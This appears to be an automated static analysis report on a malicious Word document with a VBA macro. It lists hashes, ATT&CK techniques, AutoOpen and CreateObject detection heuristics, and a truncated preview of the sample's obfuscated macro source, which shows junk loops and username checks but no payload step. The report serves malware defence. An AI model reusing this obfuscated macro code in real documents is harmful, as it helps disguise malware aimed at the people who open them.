Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6698542e8769ac0a…

MALICIOUS

Office (OLE)

Size: 218.0 KB
Created: 2018-06-26 15:49:00
Authoring application: Microsoft Office Word
First seen: 2018-11-13
MD5: 5f55764329f018375e4373287b90a2de
SHA-1: 9aed62803e22f35d8b4f7f02be986d62af5e1b42
SHA-256: 6698542e8769ac0a5f6f06a17ec022dbb165f9ac4a043005515ff75f446a7bd1
Risk Score: 162

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The 'AutoOpen' macro is present and configured to execute, indicating an attempt to run malicious code upon opening the document. The presence of 'CreateObject' further suggests the macro is designed to instantiate and run objects, likely to download and execute a second-stage payload.

Heuristics (6)

  • VBA macros detected (severity: medium) OLE_VBA_MACROS, 3 related findings
    Document contains VBA macro code
  • AutoOpen macro (severity: high) OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call (severity: high) OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens (severity: high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (severity: medium) OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (severity: info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename     Kind        Source                                                Size
macros.bas   vba-macro   oletools.olevba.extract_macros (decoded VBA source)   75857 bytes
SHA-256: 289740d54fe7d9bebfc8c5ff3c51bba16a33bc16f24b3688f604d1c6f0dcba05
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "hePtoDo"
Public Function UhyR1eb(ByRef XRhXTeFgz As String, ByVal uKn0nULZNlh As String) As String
Dim UYx5rMa() As Byte
Dim vG3FLs As String
vG3FLs = Application.UserName
Dim tiJ8nYhD As Collection
Dim Zt1aBhsh As Integer
While Len(vG3FLs) > 5
Zt1aBhsh = Zt1aBhsh + 5
YfhZENdtnI = Len(vG3FLs) - 8
Wend
If Len(Application.UserName) < 544 Then
Dim koao9Y3d7a As Collection
End If
If Application.UserName = "YoEynbp2Xwf" Then
MsgBox ("ZYQNjEDeRo5")
Else
Dim y8AhvSgg43co7w As String
y8AhvSgg43co7w = Application.UserName
End If
Dim ztK9nUX() As Byte
Dim ndzgBPTA As String
For AQdNeTWcrv = 0 To 5
ndzgBPTA = ndzgBPTA + "R"
Next AQdNeTWcrv
Dim aubWcgQl, VyQlIZD As Integer
aubWcgQl = 6 + 8
For jNtB5Sdq = 0 To 8
VyQlIZD = VyQlIZD + jNtB5Sdq
Next jNtB5Sdq
If VyQlIZD < jNtB5Sdq Then
Dim BOvWNFJGgK As Long
End If
For HJvaIVz0a = 0 To 9
yTLRtBiVYj = yTLRtBiVYj + HJvaIVz0a
Next HJvaIVz0a
Dim m703j9Z0 As Long
For ty0xS7du1V = 9 To 14
m703j9Z0 = m703j9Z0 + ty0xS7du1V
Next ty0xS7du1V
Dim Su62XmYKi, sF5xHh5F As Integer
Su62XmYKi = 5 + 7
For MfzrtB = 0 To 7
sF5xHh5F = sF5xHh5F + MfzrtB
Next MfzrtB
If sF5xHh5F < MfzrtB Then
Dim XOwLHRFaO As Long
End If
For HUM5pip3W = 0 To 8
ri7ICXo = ri7ICXo + HUM5pip3W
Next HUM5pip3W
Dim asuhtuxFwb As Long
Dim OpaQyIagv As Long
For YL6DGWLG = 5 To 16
OpaQyIagv = OpaQyIagv + YL6DGWLG
Next YL6DGWLG
Dim pAZxd3 As String
pAZxd3 = Application.UserName
Dim yTzxkTy As Collection
Dim rMfi6B1y As Integer
While Len(pAZxd3) > 7
rMfi6B1y = rMfi6B1y + 8
y1Lj5x8p = Len(pAZxd3) - 9
Wend
If Len(Application.UserName) < 529 Then
Dim cvS7mUv As Collection
End If
Dim MmNN3C78fxq As Long
For NR1Z94 = 0 To 5
SrubKFY = SrubKFY + NR1Z94
Next NR1Z94
Dim SC6GEwR7zw, Rv7ktg As Integer
SC6GEwR7zw = 8 + 6
For K3RWTRyt = 0 To 8
Rv7ktg = Rv7ktg + K3RWTRyt
Next K3RWTRyt
If Rv7ktg < K3RWTRyt Then
Dim Mvlhc7Q As Long
End If
Dim YJiw4S, zlj7LlE As Integer
YJiw4S = 5 + 7
For T4yUIahNyl = 0 To 5
zlj7LlE = zlj7LlE + T4yUIahNyl
Next T4yUIahNyl
If zlj7LlE < T4yUIahNyl Then
Dim iInNV5xfGs As Long
End If
For OFgRZ7OF5 = 0 To 9
RtIFbirS3 = RtIFbirS3 + OFgRZ7OF5
Next OFgRZ7OF5
If Application.UserName = "tvdu3clFTHP" Then
MsgBox ("GMDbeubUsS5")
Else
Dim fozEMKEyxSe01r As String
fozEMKEyxSe01r = Application.UserName
End If
If Application.UserName = "gct3QAyRQsc" Then
MsgBox ("KlXDU9WNu1K")
Else
Dim aK09H9wjble5aH As String
aK09H9wjble5aH = Application.UserName
End If
If Application.UserName = "P7iiyVxYZGT" Then
MsgBox ("OoBgoAUPy1s")
Else
Dim G5Tn8EUGYr3X91 As String
G5Tn8EUGYr3X91 = Application.UserName
End If
Dim jRWtctAx As Long
Dim Keb5MrSrw, NLLaqjxaST As Integer
Keb5MrSrw = 8 + 8
For Urib0TN3c = 0 To 8
NLLaqjxaST = NLLaqjxaST + Urib0TN3c
Next Urib0TN3c
If NLLaqjxaST < Urib0TN3c Then
Dim siwjUD8QE As Long
End If
If Application.UserName = "MhJTbuP1h6H" Then
MsgBox ("OYr1N8vP7WO")
Else
Dim h2PmB9HQpeRVrv As String
h2PmB9HQpeRVrv = Application.UserName
End If
If Len(Application.UserName) < 771 Then
Dim tb7RPdj As Collection
End If
If Len(Application.UserName) < 978 Then
Dim C8NmLJnt As Collection
End If
If Len(Application.UserName) < 494 Then
Dim ZYgo7Xm As Collection
End If
If Application.UserName = "Ou9Yf5v8VTb" Then
MsgBox ("HGiJBHQauln")
Else
Dim Hg7HK1UbTRYfh7 As String
Hg7HK1UbTRYfh7 = Application.UserName
End If
If Len(Application.UserName) < 515 Then
Dim dHeQytue As Collection
End If
Dim vnWPwZbUi As Long
Dim t1bDwI As String
For aO4tYyO = 0 To 5
t1bDwI = t1bDwI + "Y"
Next aO4tYyO
Dim Gys9U3R As String
For nDFgN7R = 0 To 5
Gys9U3R = Gys9U3R + "z"
Next nDFgN7R
Dim UTNXCQ56mQ As String
For agPRaA = 0 To 9
UTNXCQ56mQ = UTNXCQ56mQ + "W"
Next agPRaA
If Application.UserName = "q2zPQszwOib" Then
Ms
... (truncated)